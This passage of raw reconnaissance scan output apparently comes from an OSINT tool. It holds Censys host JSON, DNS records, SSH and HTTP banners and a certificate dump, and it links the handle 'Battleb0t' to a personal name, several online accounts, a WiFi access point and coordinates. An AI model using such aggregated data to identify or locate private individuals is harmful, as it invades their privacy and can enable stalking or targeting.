"2023-04-06T15:40:27.395207080Z"}, "homesayofficial.com": {"record_type": "AAAA", "resolved_at": "2023-05-08T14:59:56.576817191Z"}, "cdn-3.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:24.889964115Z"}, "www.detroitabortioncenter.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T14:18:13.771625214Z"}, "olypay.com": {"record_type": "AAAA", "resolved_at": "2023-04-13T00:46:10.231275663Z"}, "4wdinfo.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T13:06:50.126601945Z"}, "www.plus-fm.es": {"record_type": "CNAME", "resolved_at": "2023-05-09T17:04:29.567246924Z"}, "cdn-2.madeincanadadirectory.ca.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:24.840354602Z"}, "mynutrition365.com": {"record_type": "AAAA", "resolved_at": "2023-01-28T13:41:29.917096426Z"}, "antiquetablesalem.com": {"record_type": "AAAA", "resolved_at": "2023-05-05T13:43:55.541214446Z"}, "theucontgi.tk": {"record_type": "AAAA", "resolved_at": "2023-04-23T21:28:34.547869491Z"}, "rockspitmarsliga.tk": {"record_type": "AAAA", "resolved_at": "2023-05-09T21:26:55.555920792Z"}, "valleyorchards.ca": {"record_type": "AAAA", "resolved_at": "2023-05-09T12:53:46.516773828Z"}, "www.arquiteturasustentavel.arq.br.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-09-25T17:06:29.959927232Z"}, "as2.wwbn.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T16:29:12.196675622Z"}, "atlantic-hearing.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T13:58:40.953790783Z"}, "mispditbobe.tk": {"record_type": "AAAA", "resolved_at": "2023-05-08T22:29:10.107963353Z"}, "www.progettatimobili.net.br": {"record_type": "AAAA", "resolved_at": "2023-03-26T12:54:52.310136130Z"}, "www.magulike.com": {"record_type": "CNAME", "resolved_at": "2023-05-03T20:37:49.019589614Z"}, "www.meeturplanet.com": {"record_type": "AAAA", "resolved_at": "2023-05-04T15:22:12.227518637Z"}, "alexandrubadiu.ro": {"record_type": "AAAA", "resolved_at": "2023-05-05T20:03:40.049773053Z"}, "patconsidine.com": {"record_type": "AAAA", "resolved_at": "2023-05-01T15:09:59.045459058Z"}, "liftux.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T14:56:52.096682674Z"}, "www.anizm.tv": {"record_type": "AAAA", "resolved_at": "2023-05-01T20:49:32.910799070Z"}, "hessenjazz.de": {"record_type": "AAAA", "resolved_at": "2023-04-04T17:07:11.850443808Z"}, "meedsi.prinsapps.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T18:53:45.364969538Z"}, "wildanmaulana.cf": {"record_type": "AAAA", "resolved_at": "2023-05-04T13:01:54.678346749Z"}, "itallolik.gq": {"record_type": "AAAA", "resolved_at": "2023-05-09T17:19:14.126442672Z"}, "www.magulike.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-01T00:33:30.641844587Z"}, "ppm.amikom.id": {"record_type": "AAAA", "resolved_at": "2022-11-29T14:52:50.795015812Z"}, "naturisme-robertanne.fr": {"record_type": "AAAA", "resolved_at": "2023-04-30T22:46:36.240542292Z"}, "centreonicinga.wwbn.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T16:18:28.593025009Z"}, "erkilgalegohlo.cf": {"record_type": "AAAA", "resolved_at": "2022-12-22T12:29:44.995025840Z"}, "www.seribusenyum.org": {"record_type": "AAAA", "resolved_at": "2023-02-04T17:32:21.980568714Z"}, "camlovers.org": {"record_type": "AAAA", "resolved_at": "2023-05-04T21:36:27.672632585Z"}, "www.proappsys.com": {"record_type": "CNAME", "resolved_at": "2023-05-04T15:48:48.652972292Z"}, "beatroulettestrategy.net": {"record_type": "AAAA", "resolved_at": "2023-05-09T18:46:48.783088104Z"}, "www.palaciorentacar.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T20:48:31.555576583Z"}, "gymnasie-portal.dk": {"record_type": "AAAA", "resolved_at": "2023-05-08T17:28:07.281800383Z"}, "celtabetgirisdestek.com": {"record_type": "AAAA", "resolved_at": "2023-04-28T14:41:36.658675345Z"}, "kmit17.com": {"record_type": "AAAA", "resolved_at": "2023-01-29T13:41:58.275178074Z"}, "congeohryverre.tk": {"record_type": "AAAA", "resolved_at": "2023-05-10T20:50:17.495400280Z"}, "oradfoy.tk": {"record_type": "AAAA", "resolved_at": "2023-04-18T21:32:57.447114952Z"}, "www.fopprey.com": {"record_type": "AAAA", "resolved_at": "2022-11-11T13:13:15.748303827Z"}, "bouncev2.precisiongroup.com.au": {"record_type": "AAAA", "resolved_at": "2023-05-08T12:27:03.617492048Z"}, "crabcamkanawi.ml": {"record_type": "AAAA", "resolved_at": "2023-04-29T18:29:51.293879545Z"}, "xn--kkkenvgte-l3a6q.dk": {"record_type": "AAAA", "resolved_at": "2023-04-24T17:07:19.955735049Z"}, "riostitelos.ga": {"record_type": "AAAA", "resolved_at": "2023-04-25T17:42:06.424778601Z"}, "catchhartmactaros.tk": {"record_type": "AAAA", "resolved_at": "2023-04-24T22:19:56.707459197Z"}, "topcard.com.pl": {"record_type": "AAAA", "resolved_at": "2023-05-04T21:48:11.468590186Z"}, "www.comeunity.club": {"record_type": "AAAA", "resolved_at": "2023-04-20T16:30:09.585410651Z"}, "longchampcolombia.com": {"record_type": "AAAA", "resolved_at": "2023-04-25T15:13:12.725728600Z"}, "rezidenceaurum.cz": {"record_type": "AAAA", "resolved_at": "2023-03-11T15:26:42.690547113Z"}, "webdisk.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-05-01T12:42:56.064120059Z"}, "cpcalendars.menuin.pe": {"record_type": "AAAA", "resolved_at": "2023-03-16T07:00:36.539543312Z"}, "cdg-sex-game.com": {"record_type": "AAAA", "resolved_at": "2023-04-30T14:10:46.256225534Z"}, "ftp.jogjacontemporary.net": {"record_type": "AAAA", "resolved_at": "2023-05-10T19:05:42.498201439Z"}, "cg.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-04-29T12:44:12.255784234Z"}, "shop.geminibio.com": {"record_type": "AAAA", "resolved_at": "2023-05-10T14:29:06.617280204Z"}, "kola-jen.com": {"record_type": "AAAA", "resolved_at": "2022-12-01T13:36:32.553804192Z"}, "askasdkas.jkhs.ml": {"record_type": "AAAA", "resolved_at": "2023-04-24T18:46:30.034839654Z"}, "kozan.com.br": {"record_type": "AAAA", "resolved_at": "2023-05-10T12:33:17.879735441Z"}, "observatoriodevino.com": {"record_type": "AAAA", "resolved_at": "2022-10-03T13:56:38.631534190Z"}, "cpanel.vertexhc.com": {"record_type": "AAAA", "resolved_at": "2023-05-03T16:02:17.928893946Z"}, "ok-medicalbilling-ok.live": {"record_type": "AAAA", "resolved_at": "2023-05-01T17:47:16.990114377Z"}, "pwrcdn.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T05:41:18.589594638Z"}, "cpcalendars.diegobruno.com.br": {"record_type": "AAAA", "resolved_at": "2023-05-06T12:35:36.066684702Z"}, "login.sanopoly.com": {"record_type": "AAAA", "resolved_at": "2023-04-22T00:18:08.415048164Z"}, "bouncefitness.precisiongroup.com.au": {"record_type": "AAAA", "resolved_at": "2023-02-21T12:15:56.351172926Z"}, "houseofbeauty.org.uk": {"record_type": "AAAA", "resolved_at": "2023-05-09T21:44:36.458226231Z"}, "ymfasti.gq": {"record_type": "AAAA", "resolved_at": "2023-04-19T19:41:20.884654729Z"}, "typearound.com": {"record_type": "AAAA", "resolved_at": "2023-04-24T16:14:46.070651001Z"}, "romacerah.org": {"record_type": "AAAA", "resolved_at": "2023-05-01T02:19:33.400343679Z"}, "www.seminare-steinbergerhof.com": {"record_type": "AAAA", "resolved_at": "2022-11-05T14:24:46.885115354Z"}, "charme-des-montagnes.com": {"record_type": "AAAA", "resolved_at": "2022-12-02T09:33:27.167277863Z"}, "mail.hlb.co.za": {"record_type": "AAAA", "resolved_at": "2023-04-26T22:59:18.792128403Z"}, "growthwithsystem.be": {"record_type": "AAAA", "resolved_at": "2022-10-31T12:14:11.983652539Z"}, "profmarpdust.gq": {"record_type": "AAAA", "resolved_at": "2023-04-19T19:40:52.408802267Z"}, "adrdangerousgoods.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T13:16:27.339530183Z"}, "xelxican.cf": {"record_type": "AAAA", "resolved_at": "2022-10-22T12:32:56.395415126Z"}, "oliveandspicecroatia.com": {"record_type": "AAAA", "resolved_at": "2023-04-29T15:31:59.293869948Z"}, "voyrabapbo.tk": {"record_type": "AAAA", "resolved_at": "2023-05-08T22:30:30.625066762Z"}, "kerzcoobamabasvio.cf": {"record_type": "AAAA", "resolved_at": "2023-05-07T12:50:31.337450458Z"}, "centraldeviviendas.es": {"record_type": "AAAA", "resolved_at": "2023-04-30T22:34:28.683222668Z"}, "www.invertsport.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-10-25T15:57:28.766154138Z"}, "myneonglow.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T15:10:52.426252771Z"}, "fowenthotatecsu.tk": {"record_type": "AAAA", "resolved_at": "2023-04-24T22:20:29.238762448Z"}, "www.thedot.cn.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2023-05-05T18:22:25.417735752Z"}, "dhff3aa.fit": {"record_type": "AAAA", "resolved_at": "2022-10-21T14:23:24.018557130Z"}, "www.sexytie.com": {"record_type": "AAAA", "resolved_at": "2023-05-03T15:32:31.959854869Z"}, "comprafcesssuptitog.ga": {"record_type": "AAAA", "resolved_at": "2023-05-11T17:33:53.554671898Z"}, "www.brianelstonlaw.com": {"record_type": "AAAA", "resolved_at": "2023-04-24T14:13:06.005656367Z"}, "datenschlauch.de": {"record_type": "AAAA", "resolved_at": "2023-05-02T23:34:28.039399648Z"}}, "names": | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Gettr (Category: social)
https://gettr.com/user/Altpapier | Altpapier |
| 2023-05-12 02:54:54 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 2a06:98c1:3121::1 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pastebin (Category: tech)
https://pastebin.com/u/Battleb0t | Battleb0t |
| 2023-05-12 02:54:08 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b9:dc:49:67:68:c5:fe:31:cf:92:a4:a3:f2:91:5a:dc:15
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 19:07:11 2023 GMT
Not After : Apr 2 19:07:10 2023 GMT
Subject: CN=files.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:e4:bb:72:24:9a:3b:f5:c0:b6:00:b2:9e:75:64:
a2:c5:05:47:75:ee:45:0a:c4:64:a2:83:f0:3f:73:
63:b5:70:6c:7f:e6:38:41:f0:ce:48:1b:e9:cb:50:
e5:db:9b:1e:52:33:00:08:50:9b:48:a3:21:b1:72:
aa:97:ba:07:58:22:50:7b:e0:2e:66:ce:83:70:77:
e2:36:f5:0e:13:40:a0:5f:8e:ab:d5:28:a5:4a:11:
32:bf:f0:01:46:1e:7f:2c:f4:2c:07:22:93:45:a7:
52:4d:66:5a:2e:a0:5e:1d:49:67:6d:93:3c:d4:e7:
67:ac:0d:eb:84:c4:ad:1c:c6:3a:c8:a3:8e:b1:df:
54:8a:52:1f:ab:aa:01:49:57:78:fa:b6:5c:77:ae:
0a:d5:12:86:cb:ea:c3:13:b3:1e:aa:59:f3:df:50:
ef:11:40:b8:bb:45:d3:4e:d6:8e:bd:f2:33:ae:52:
06:ca:88:01:72:31:4f:46:00:bf:98:93:9a:2f:f8:
47:9a:87:b9:a0:cb:d1:a8:89:43:66:4d:f6:54:8d:
cf:4c:31:d7:d0:0d:e1:33:7b:c6:0e:1d:4a:3f:9a:
c4:dd:c7:68:08:e6:6f:b9:26:6c:49:f2:5f:ad:59:
da:74:03:6e:20:eb:9a:d2:3d:fb:bc:79:34:c6:43:
38:6b:71:f9:76:22:a0:ca:93:2e:c8:20:b0:a5:40:
b2:06:05:e9:aa:de:b1:b0:40:d3:fa:2b:db:3c:b4:
82:d4:58:96:b7:bc:70:be:ac:1c:cb:fc:f4:c1:71:
31:c2:05:84:ce:b2:c9:8b:1e:36:fd:72:15:79:33:
62:66:31:a9:1f:5f:76:ce:5e:82:a3:20:7b:a6:f9:
68:6f:ff:65:d5:4b:45:ed:7b:6b:c9:7e:38:35:b0:
ed:10:1d:cb:42:25:ea:6d:e6:42:50:4c:82:d7:21:
2e:ac:aa:6c:ee:6b:f7:e1:58:64:07:26:55:c1:2f:
e6:5e:f4:d7:f0:f0:f1:80:c4:a5:9f:c7:96:10:6f:
58:39:48:6a:55:ca:52:01:6a:3b:90:48:bc:27:e3:
bb:2e:83:ea:d3:dc:20:53:21:0d:af:34:82:fc:9f:
4c:d4:4a:b7:14:07:01:bb:2c:76:8e:22:ed:cd:33:
84:b4:42:01:5f:9f:c6:60:56:3d:e0:bb:bf:10:3f:
42:ca:65:31:ce:e9:5e:a4:e2:24:f7:ab:0e:d3:ce:
0e:6d:01:e6:42:c0:05:7f:8e:8b:85:68:57:f5:6c:
ca:7f:14:f3:74:ac:f1:ad:74:c5:8e:20:02:20:df:
19:4d:31:07:4a:75:45:cf:f0:a5:0c:ad:70:b3:f4:
12:1c:8b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CF:FE:0F:FB:EC:E3:E9:7B:CF:AB:EA:49:61:6D:B0:C0:A0:EB:11:BC
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:files.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 2 20:07:12.002 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A6:85:F1:8A:49:83:21:33:60:55:2D:
99:FB:CF:EE:44:65:69:64:79:C2:61:04:D1:E4:30:AC:
C7:73:4A:13:C5:02:21:00:AC:83:C1:FC:AB:D2:CB:09:
E8:3B:57:0B:C4:10:3C:51:28:96:2A:AD:6A:76:88:D3:
6A:BA:99:2E:34:BF:39:86
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77:
15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13
Timestamp : Jan 2 20:07:12.157 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:06:67:C4:B5:35:BC:02:1A:34:AD:6C:A4:
C6:E0:88:8E:0A:15:4F:7B:AF:4C:84:1D:15:95:9C:34:
C6:69:14:75:02:21:00:D6:5B:0E:91:76:65:0A:B8:EF:
EA:C9:50:39:9F:B1:18:05:1A:64:EC:3B:EF:73:22:11:
ED:D2:3B:B2:A5:63:2B
Signature Algorithm: sha256WithRSAEncryption
94:68:ec:5c:d2:7e:2d:82:58:3e:f0:cb:47:6a:10:74:ed:14:
31:55:d2:fc:07:ea:e6:b9:2b:a6:5d:fb:b0:be:2a:39:98:6e:
1b:fd:2d:97:20:dd:74:9f:d7:b0:2d:0e:14:3a:21:fd:55:19:
4d:bc:eb:97:a9:5a:64:1e:5e:ab:09:fd:8c:47:43:b4:97:96:
97:49:ac:a8:a8:ae:80:dc:40:88:24:da:62:81:70:26:c1:be:
e3:8b:70:a0:e6:b0:9f:c5:a7:45:00:28:1e:05:50:30:08:27:
e0:d5:e0:62:45:15:16:96:8c:13:de:49:ea:61:78:cb:7e:a1:
d5:93:da:97:f7:07:f3:be:42:4f:13:74:e1:ff:46:94:80:da:
f1:1d:04:f6:72:d0:2d:92:05:be:d4:04:69:d5:82:84:f9:5a:
ef:98:c5:5d:b0:27:36:45:cf:eb:71:54:9a:0d:6f:3c:49:23:
b6:9b:be:8a:ca:3c:4b:e8:78:6a:03:13:65:55:9c:8c:1b:f0:
fe:30:16:e0:6f:32:f7:3f:aa:f2:94:1e:87:e0:1f:d5:4c:32:
ca:75:84:5e:e4:d3:9f:f9:2a:a5:85:29:a3:9b:57:5a:6b:b7:
d0:02:0c:a9:a2:a4:01:0e:75:01:9b:03:39:3e:0b:d4:cf:11:
0e:ca:93:36
| battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom707CF8 (Net ID: 00:0C:F6:70:7C:F8) | 50.8897, 6.0563 |
| 2023-05-12 03:09:59 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | clientify.net | inbox.clientify.net |
| 2023-05-12 03:15:46 | Username | No | Account Finder | 8 | 0 | 1 | 0 | None | patrickpogoda | Patrick Pogoda |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/Battleb0t | Battleb0t |
| 2023-05-12 02:53:07 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | funny.battleb0t.xyz |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-512-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": 